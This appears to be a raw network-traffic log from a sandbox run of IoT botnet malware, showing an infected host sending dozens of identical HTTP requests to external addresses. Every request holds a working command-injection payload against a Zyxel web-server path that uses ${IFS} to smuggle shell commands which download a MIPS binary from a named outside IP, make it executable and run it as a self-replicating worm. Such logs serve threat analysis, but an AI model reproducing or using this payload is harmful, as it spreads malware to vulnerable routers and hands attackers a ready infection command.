                                      Jan 19, 2024 17:29:25.635446072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2702192.168.2.145591883.55.145.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635477066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2703192.168.2.1443670201.14.242.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635528088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2704192.168.2.144150445.128.133.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635564089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2705192.168.2.1436370210.1.166.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635590076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2706192.168.2.1455810170.87.246.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635622978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2707192.168.2.1450864152.6.165.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635665894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2708192.168.2.1455656147.34.45.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635711908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2709192.168.2.1439316138.91.228.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635757923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2710192.168.2.1459708129.162.120.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635780096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2711192.168.2.1451118172.255.69.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635823965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2712192.168.2.1434208197.146.221.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635860920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2713192.168.2.1458368130.37.164.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635905027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2714192.168.2.1437774153.65.41.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635934114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2715192.168.2.1446528220.122.115.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635984898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2716192.168.2.1432962173.38.160.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636017084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2717192.168.2.145565839.162.85.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636043072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2718192.168.2.143877647.11.22.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636065960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2719192.168.2.145038636.86.146.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636141062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2720192.168.2.1454342121.94.220.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636195898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2721192.168.2.144643888.70.27.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636250019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2722192.168.2.1434632211.210.98.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636265039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2723192.168.2.1445328162.247.154.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636281013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2724192.168.2.1440500216.224.176.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636334896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2725192.168.2.1453678176.57.90.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636385918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2726192.168.2.1440290172.191.229.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636429071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2727192.168.2.1452830140.5.121.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636466026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2728192.168.2.146006853.166.97.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636519909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2729192.168.2.143300064.84.167.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636548996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2730192.168.2.1432972140.181.227.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636605024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2731192.168.2.1455550148.230.224.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636619091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2732192.168.2.1458482141.174.79.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636666059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2733192.168.2.144867883.17.27.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636709929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2734192.168.2.1435878171.32.123.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636740923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2735192.168.2.145975850.53.215.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636785984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2736192.168.2.1435034124.61.53.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636842966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2737192.168.2.1444932205.206.118.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636866093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2738192.168.2.144812264.188.249.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636914015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2739192.168.2.1456128196.246.19.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636936903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2740192.168.2.1437272146.176.22.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.636964083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2741192.168.2.143978034.142.183.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637007952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2742192.168.2.144922450.118.107.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637034893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2743192.168.2.143650869.118.163.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637080908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2744192.168.2.14480164.171.243.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637109995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2745192.168.2.144561464.140.106.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637167931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2746192.168.2.1456824140.14.207.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637207985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2747192.168.2.143779075.137.115.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637234926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2748192.168.2.14538668.199.181.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637271881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2749192.168.2.145542834.172.150.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637319088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2750192.168.2.143326237.60.64.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637357950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2751192.168.2.144748299.249.133.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637398958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2752192.168.2.145805242.135.217.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637440920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2753192.168.2.145190879.120.171.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637494087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2754192.168.2.1448800106.77.144.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637535095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2755192.168.2.1436570174.245.221.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637548923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2756192.168.2.145306225.231.14.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637581110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2757192.168.2.1441414128.159.228.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637624025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2758192.168.2.1439294190.95.104.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637680054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2759192.168.2.144944685.73.227.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637726068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2760192.168.2.1457014132.191.45.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637763977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2761192.168.2.145041012.28.166.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637804985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2762192.168.2.1443726182.23.110.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637831926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2763192.168.2.143671448.230.240.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637877941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2764192.168.2.1447340109.96.147.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.637897968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2765192.168.2.1451644172.97.237.137443
                                      TimestampBytes transferredDirectionData
